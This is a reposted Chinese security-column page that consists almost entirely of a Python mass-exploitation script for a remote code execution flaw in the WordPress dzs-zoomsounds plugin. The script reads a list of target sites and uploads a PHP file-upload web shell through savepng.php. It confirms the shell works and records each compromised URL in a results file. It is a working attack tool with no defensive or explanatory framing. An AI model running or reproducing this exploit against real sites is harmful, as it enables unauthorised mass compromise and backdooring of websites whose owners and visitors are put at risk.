WordPress 插件 dzs-zoomsounds - 远程代码执行 (RCE)
WordPress 插件 dzs-zoomsounds - 远程代码执行 (RCE)
Khan安全团队
发布于 2022-03-03 09:41:15
发布于 2022-03-03 09:41:15
文章被收录于专栏:Khan安全团队
import os
import requests
import threading
from multiprocessing.dummy import Pool,Lock
from bs4 import BeautifulSoup
import time
import smtplib,sys,ctypes
from random import choice
from colorama import Fore
from colorama import Style
from colorama import init
import re
import time
from time import sleep
init(autoreset=True)
fr = Fore.RED
gr = Fore.BLUE
fc = Fore.CYAN
fw = Fore.WHITE
fy = Fore.YELLOW
fg = Fore.GREEN
sd = Style.DIM
sn = Style.NORMAL
sb = Style.BRIGHT
Bad = 0
Good = 0
def Folder(directory):
if not os.path.exists(directory):
os.makedirs(directory)
Folder("exploited")
def clear():
try:
if os.name == 'nt':
os.system('cls')
else:
os.system('clear')
except:
pass
def finder(i) :
global Bad,Good
head = {'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36'}
try :
x = requests.session()
listaa = ['/wp-content/plugins/dzs-zoomsounds/savepng.php?location=1877.php']
for script in listaa :
url = (i+"/"+script)
while True :
req_first = x.get(url, headers=head)
if "error:http raw post data does not exist" in req_first.text :
burp0_headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36", "Accept-Encoding": "gzip, deflate", "Accept": "*/*", "Connection": "close"}
burp0_data = "<?php\r\nerror_reporting(0);\r\necho(base64_decode(\"T3ZlcnRoaW5rZXIxODc3Ijxmb3JtIG1ldGhvZD0nUE9TVCcgZW5jdHlwZT0nbXVsdGlwYXJ0L2Zvcm0tZGF0YSc+PGlucHV0IHR5cGU9J2ZpbGUnbmFtZT0nZicgLz48aW5wdXQgdHlwZT0nc3VibWl0JyB2YWx1ZT0ndXAnIC8+PC9mb3JtPiI=\"));\r\n@copy($_FILES['f']['tmp_name'],$_FILES['f']['name']);\r\necho(\"<a href=\".$_FILES['f']['name'].\">\".$_FILES['f']['name'].\"</a>\");\r\n?>"
requests.post(url, headers=burp0_headers, data=burp0_data,timeout=45)
urlx = (i+"/"+"/wp-content/plugins/dzs-zoomsounds/1877.php")
req_second = x.get(urlx, headers=head)
if "Overthinker1877" in req_second.text :
Good = Good + 1
print(fg+"Exploited "+fw+">> "+fg+" = "+urlx)
with open("exploited/shell.txt","a") as file :
file.write(urlx+"\n")
file.close()
else :
Bad = Bad + 1
print(fc+""+fw+"["+fr+"X"+fw+"] "+fr+" "+i+" "+fw+" <<< "+fr+" Can't Exploit")
else :
Bad = Bad + 1
print(fc+""+fw+"["+fr+"X"+fw+"] "+fr+" "+i+" "+fw+" <<< "+fr+" Not Vuln")
pass
break
except :
pass
if os.name == 'nt':
ctypes.windll.kernel32.SetConsoleTitleW('1877Exploit | Exploited-{} | Not Vuln-{}'.format(Good, Bad))
else :
sys.stdout.write('\x1b]2; 1877Exploit | Exploited-{} | Not Vuln-{}\x07'.format(Good,Bad))
def key_logo():
clear = '\x1b[0m'
colors = [36, 32, 34, 35, 31, 37]
x = ' [ + ] OVERTHINKER1877 EXPLOIT'
for N, line in enumerate(x.split('\n')):
sys.stdout.write('\x1b[1;%dm%s%s\n' % (choice(colors), line, clear))
time.sleep(0.05)
def process(line):
time.sleep(1)
def run() :
key_logo()
clear()
print("""
[-] -----------------------------------------[-]
[+] WwW.1877.TeaM
[-] -----------------------------------------[-]
\n \n""")
file_name = input("Website List : ")
op = open(file_name,'r').read().splitlines()
TEXTList = [list.strip() for list in op]
p = Pool(int(input('Thread : ')))
p.map(finder, TEXTList)
run()本文系转载,前往查看
如有侵权,请联系 cloudcommunity@tencent.com 删除。
本文系转载,前往查看
如有侵权,请联系 cloudcommunity@tencent.com 删除。
评论
登录后参与评论
推荐阅读
腾讯云开发者
